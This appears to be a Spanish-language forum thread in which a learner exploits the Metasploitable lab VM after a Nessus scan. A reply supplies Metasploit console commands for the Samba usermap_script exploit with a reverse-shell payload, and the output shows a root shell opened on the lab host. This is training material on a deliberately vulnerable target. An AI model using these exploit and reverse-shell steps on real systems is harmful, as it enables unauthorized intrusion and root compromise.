Que tal ando aprendiendo a usar nessu,metasploits y varias cosas mas en fin, corri el nessus contra la maquina virtual que difunde rapid7 creo( metasploitable ) un resultado de nessus me dice lo siguiente:
CVE 2007-2446
La version de servidor samba de la maquina objetivo es vulnerable a un ataque de desbordamiento de buffer, y en el reporte me dice cual exploit usar con metasploits , entonces
tecleo:
#msfconsole
msf use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST X.X:X:.X
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/exec
msf exploit(lsa_transnames_heap) > set CMD ifconfig
msf exploit(lsa_transnames_heap) > show options
Module options (exploit/linux/samba/lsa_transnames_heap):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.107 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE LSARPC yes The pipe name to use
Payload options (linux/x86/exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD ifconfig yes The command string to execute
Exploit target:
Id Name
-- ----
0 Linux vsyscall
msf exploit(lsa_transnames_heap) > exploit
- Creating nop sled....
- Trying to exploit Samba with address 0xffffe410...
- Connecting to the SMB service...
[-] Exploit exception: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
?????Que hago mal??o es un positivo falso lo que me da nessus, porque hace mucho cuando andaba en mi epoca de aprender lo mas rapido posible corria el armitage desde BT y funcionaba solo!!! Jeje pero ahorita me muevo con debia alguna idea
Saludos!
El problema esta en el exploit que estas tratando de usar:
msf > use exploit/multi/samba/usermap_scriptmsf exploit(usermap_script) > show optionsModule options (exploit/multi/samba/usermap_script):Name Current Setting Required Description —- ————— ——– ———– RHOST 192.168.1.34 yes The target address RPORT 445 yes The target port Exploit target: Id Name – —- 0 Automatic msf exploit(usermap_script) > set PAYLOAD cmd/unix/reversePAYLOAD => cmd/unix/reverse msf exploit(usermap_script) > set LHOST 192.168.1.33LHOST => 192.168.1.33 msf exploit(usermap_script) > exploit- Started reverse double handler
- Accepted the first client connection...
- Accepted the second client connection...
- Command: echo rm6wOwiDrg4PM9Ug;
- Writing to socket A
- Writing to socket B
- Reading from sockets...
- Reading from socket B
- B: "rm6wOwiDrg4PM9Ug\r\n"
- Matching...
- A is input...
- Command shell session 4 opened (192.168.1.33:4444 -> 192.168.1.34:53107) at Wed May 18 00:40:18 +0200 2011
uname -r 2.6.24-16-server whoami root
|
Hace algunos meses escribí una serie de publicaciones sobre como explotar las vulnerabilidades que vienen incluidas en Metasploitable. La primera parte comienza aquí:
http://thehackerway.com/2011/06/17/penetrando-sistemas-bajo-plataforma-gnulinux-vulnerable-con-metasploit-framework-parte-i/
Por si te interesa conocer un poco más sobre como atacar una plataforma vulnerable.
Un Saludo.
Llegando a mi casa lo pruebo tambien para leer los tutos que has hecho.
Ya mas comento que paso
Saludos
Que tal adastra probe el exploit que me diste funciono muchas gracias pero porque nessus me da uno y no funciona ?? viendo las opciones del exploit que me diste me daba en el puerto de destino el 139 que venia por default, y funciono?? luego lo cale con el 445 y tambien , al googlear sobre ese puerto 445 al parecer hay algun tipo de vulnerabilidad a explotar le investigare bien ya despues comento que encontre.Yo pensaba que samba corria en los puertos 137 a 139 pero no entiendo el 445
Otra cosa ando usando el metasploits pero cuando le doy
> search telnet o cualquie cosa no me da ningun resultado la busqueda porque??
Saludos